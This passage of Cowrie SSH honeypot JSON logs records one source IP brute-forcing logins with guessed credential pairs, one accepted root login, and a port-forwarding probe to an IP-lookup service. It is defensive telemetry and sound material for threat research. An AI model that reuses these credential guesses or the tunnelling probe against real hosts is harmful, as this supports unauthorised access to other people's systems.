ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:16.332577Z","src_ip":"212.227.235.229","session":"027855791de5"}
{"eventid":"cowrie.login.failed","username":"kim","password":"kim123","message":"login attempt [kim/kim123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:17.737934Z","src_ip":"212.227.235.229","session":"518e4f84e244"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:17.763609Z","src_ip":"212.227.235.229","session":"fc651060c705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59968,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d3dd53399b5","protocol":"ssh","message":"New connection: 212.227.235.229:59968 (1.2.3.4:22) [session: 5d3dd53399b5]","sensor":"my-vps","timestamp":"2025-08-26T04:10:18.637345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:18.655971Z","src_ip":"212.227.235.229","session":"5d3dd53399b5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"andrew","message":"login attempt [admin/andrew] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:18.684879Z","src_ip":"212.227.235.229","session":"027855791de5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54556,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fc537c97d2e","protocol":"ssh","message":"New connection: 212.227.235.229:54556 (1.2.3.4:22) [session: 1fc537c97d2e]","sensor":"my-vps","timestamp":"2025-08-26T04:10:18.896903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:18.965914Z","src_ip":"212.227.235.229","session":"1fc537c97d2e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:18.986306Z","src_ip":"212.227.235.229","session":"5d3dd53399b5"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:19.026000Z","src_ip":"212.227.235.229","session":"518e4f84e244"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:19.172948Z","src_ip":"212.227.235.229","session":"1fc537c97d2e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:19.969774Z","src_ip":"212.227.235.229","session":"027855791de5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwertyuiop","message":"login attempt [admin/qwertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:20.859614Z","src_ip":"212.227.235.229","session":"5d3dd53399b5"}
{"eventid":"cowrie.login.success","username":"root","password":"explorer","message":"login attempt [root/explorer] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:10:22.463473Z","src_ip":"212.227.235.229","session":"1fc537c97d2e"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:22.986215Z","src_ip":"212.227.235.229","session":"5d3dd53399b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60024,"dst_ip":"1.2.3.4","dst_port":22,"session":"b37ec4efac0f","protocol":"ssh","message":"New connection: 212.227.235.229:60024 (1.2.3.4:22) [session: b37ec4efac0f]","sensor":"my-vps","timestamp":"2025-08-26T04:10:23.248922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:23.283983Z","src_ip":"212.227.235.229","session":"b37ec4efac0f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:23.547163Z","src_ip":"212.227.235.229","session":"b37ec4efac0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:10:23.769268Z","session":"1fc537c97d2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:10:24.650104Z","src_ip":"212.227.235.229","session":"1fc537c97d2e"}
{"eventid":"cowrie.login.failed","username":"office","password":"office","message":"login attempt [office/office] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:24.799533Z","src_ip":"212.227.235.229","session":"b37ec4efac0f"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:24.923084Z","src_ip":"212.227.235.229","session":"1fc537c97d2e"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:26.736821Z","src_ip":"212.227.235.229","session":"b37ec4efac0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53246,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d5de707f949","protocol":"ssh","message":"New connection: 212.227.235.229:53246 (1.2.3.4:22) [session: 8d5de707f949]","sensor":"my-vps","timestamp":"2025-08-26T04:10:27.443780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:27.447726Z","src_ip":"212.227.235.229","session":"8d5de707f949"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53250,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ca90aed869","protocol":"ssh","message":"New connection: 212.227.235.229:53250 (1.2.3.4:22) [session: c1ca90aed869]","sensor":"my-vps","timestamp":"2025-08-26T04:10:27.585664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:27.695586Z","src_ip":"212.227.235.229","session":"c1ca90aed869"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:27.750740Z","src_ip":"212.227.235.229","session":"8d5de707f949"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60026,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f838b69e8a","protocol":"ssh","message":"New connection: 212.227.235.229:60026 (1.2.3.4:22) [session: 35f838b69e8a]","sensor":"my-vps","timestamp":"2025-08-26T04:10:28.099170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:28.199567Z","src_ip":"212.227.235.229","session":"35f838b69e8a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:28.442865Z","src_ip":"212.227.235.229","session":"35f838b69e8a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.co